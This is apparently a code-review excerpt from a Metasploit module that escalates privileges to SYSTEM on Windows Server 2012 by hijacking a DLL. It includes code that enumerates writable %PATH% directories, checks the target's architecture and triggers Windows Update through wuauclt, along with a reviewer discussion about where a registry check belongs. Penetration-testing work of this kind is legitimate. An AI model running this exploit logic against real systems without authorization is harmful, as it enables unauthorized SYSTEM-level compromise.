modules/exploits/windows/local/srclient_dll_hijacking.rb

```diff
@@ -0,0 +1,329 @@
+
+    if sysinfo['OS'].include?('R2')
+      return Exploit::CheckCode::Safe('Target is Windows Server 2012 R2, but only Windows Server 2012 is vulnerable.')
+    end
+
+    print_status("Target is #{sysinfo['OS']}")
+
+    # get groups for the current user, this is necessary to verify write permissions
+    current_user = session.sys.config.getuid
+    user_groups = grab_user_groups(current_user)
+
+    # get %PATH% dirs and check if the current user can write to them
+    print_status('Checking for writable directories in %PATH%...')
+    path_dirs = get_envs('PATH')
+
+    if path_dirs.blank? || path_dirs['PATH'].blank?
+      get_path_fail_message = 'Failed to obtain %PATH% directories.'
+      unless provided_path_dir.blank?
+        get_path_fail_message << force_exploit_message
+      end
+      return Exploit::CheckCode::Unknown(get_path_fail_message)
+    end
+
+    @writable_path_dirs = enumerate_writable_path_dirs(path_dirs, user_groups, current_user)
+
+    writable_path_dirs_fail_message = "#{current_user} does not seem to have write permissions to any of the %PATH% directories"
+
+    if @writable_path_dirs.empty?
+      unless provided_path_dir.blank?
+        writable_path_dirs_fail_message << force_exploit_message
+      end
+      return Exploit::CheckCode::Safe(writable_path_dirs_fail_message)
+    end
+
+    if provided_path_dir.blank?
+      print_good("#{current_user} has write permissions to the following %PATH% directories:")
+      print_status('')
+      @writable_path_dirs.each { |wpd| print_status("\t#{wpd}") }
+      print_status('')
+    else
+      print_good("#{current_user} has write permissions to #{provided_path_dir}")
+    end
+
+    return Exploit::CheckCode::Appears
+  end
+
+  def exploit
+    if is_system?
+      fail_with(Failure::None, 'Session is already elevated')
+    end
+
+    if sysinfo['Architecture'] =~ /wow64/i
+      fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
+    elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86
+      fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
+    elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64
+      fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
+    end
+
+    # There are two commands we can run to get the target to start checking for Windows updates, which should launch TiWorker.exe and trigger the payload as SYSTEM
+    ## 'wuauclt /detectnow': This triggers the payload in the background, but won't work when Windows Update is set to never check for updates.
+    ## 'wuauclt /selfupdatemanaged': This triggers the payload by launching the Windows Update UI. This is far from stealthy, but works with all Windows Update settings.
+
+    # obtain the Windows Update setting
+    wupdate_setting = registry_getvaldata('HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WindowsUpdate\\Auto Update', 'AUOptions')
+
```

Comment:
I thought about the best way to handle the case where the value for this registry is nil.  I think it likely the check should happen in the check function before we grab all the permissions for the folders, as that's a lot of work that could be nullified by a single reg check.

Reply:
I agree, I have added this to check now. If the registry value is nil, the module returns `Safe` but I made sure in the exploit method that exploitation can still be attempted if users use `ForceExploit` in this case.